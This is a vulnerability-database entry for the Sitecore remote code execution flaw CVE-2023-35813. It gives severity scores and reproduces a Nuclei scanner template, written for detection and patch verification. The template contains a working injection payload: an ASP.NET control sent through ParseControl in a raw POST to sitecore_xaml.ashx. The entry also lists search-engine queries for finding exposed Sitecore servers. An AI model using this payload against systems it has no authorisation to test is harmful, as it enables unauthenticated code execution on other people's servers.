Lucene search
ProjectDiscoveryNUCLEI:CVE-2023-35813HistoryOct 10, 2023 - 5:56 p.m.
Sitecore - Remote Code Execution
2023-10-1017:56:29
ProjectDiscovery
github.com
98
cve2023
sitecore
remote code execution
experience manager
experience platform
experience commerce
9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
9.8 High
AI Score
Confidence
High
0.851 High
EPSS
Percentile
98.6%
Multiple Sitecore products allow remote code execution. This affects Experience Manager, Experience Platform, and Experience Commerce through 10.3.
id: CVE-2023-35813
info:
name: Sitecore - Remote Code Execution
author: DhiyaneshDk,iamnoooob
severity: critical
description: |
Multiple Sitecore products allow remote code execution. This affects Experience Manager, Experience Platform, and Experience Commerce through 10.3.
reference:
- https://support.sitecore.com/kb?id=kb_article_view\u0026sysparm_article=KB1002979
- https://code-white.com/blog/exploiting-asp.net-templateparser-part-1/
- https://nvd.nist.gov/vuln/detail/CVE-2023-35813
- https://support.sitecore.com/kb?id=kb_article_view&sysparm_article=KB1002979
- https://github.com/BagheeraAltered/CVE-2023-35813-PoC
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-35813
cwe-id: CWE-22,CWE-23
epss-score: 0.8819
epss-percentile: 0.98674
cpe: cpe:2.3:a:sitecore:experience_commerce:*:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: sitecore
product: experience_commerce
shodan-query:
- title:"Sitecore"
- http.title:"sitecore"
fofa-query: title="sitecore"
google-query: intitle:"sitecore"
tags: cve2023,cve,sitecore,rce
variables:
string: "{{rand_base(6)}}"
payload: |
<%@Register
TagPrefix = 'x'
Namespace = 'System.Runtime.Remoting.Services'
Assembly = 'System.Runtime.Remoting, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089'
%>
<x:RemotingService runat='server'
Context-Response-ContentType='{{string}}'
/>
http:
- raw:
- |
POST /sitecore_xaml.ashx/-/xaml/Sitecore.Xaml.Tutorials.Styles.Index HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
__ISEVENT=1&__SOURCE=&__PARAMETERS=ParseControl("{{url_encode(payload)}}")
matchers:
- type: dsl
dsl:
- contains(content_type, '{{string}}')
- contains_all(body, 'commands', 'command', 'value')
- status_code == 200
condition: and
# digest: 4b0a00483046022100e3153dc84f4ba7e286424b653c26c3bb3b658b1651591ad03ff10e7525b31a7c022100cd5787950a2707a418d57a6f0cfce198a1313f079f8ee54d35cec5bc4f49b57e:922c64590222798bb761d5b6d8e72950Related
packetstorm
packetstorm
Sitecore 8.2 Remote Code Execution
2024-03-11 00:00:00
githubexploit
githubexploit
Exploit for CVE-2023-35813
2023-12-31 05:23:09
Exploit for CVE-2023-35813
2023-12-31 05:23:09
Exploit for CVE-2023-35813
2024-01-15 14:14:42
prion
prion
Remote code execution
2023-06-17 23:15:00
cve
cve
CVE-2023-35813
2023-06-17 23:15:09
cvelist
cvelist
CVE-2023-35813
2023-06-17 00:00:00
nvd
nvd
CVE-2023-35813
2023-06-17 23:15:09
exploitdb
exploitdb
Sitecore - Remote Code Execution v8.2
2024-03-11 00:00:00
zdt
zdt
Sitecore - Remote Code Execution v8.2 Exploit
2024-03-11 00:00:00
9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
9.8 High
AI Score
Confidence
High
0.851 High
EPSS
Percentile
98.6%
Related for NUCLEI:CVE-2023-35813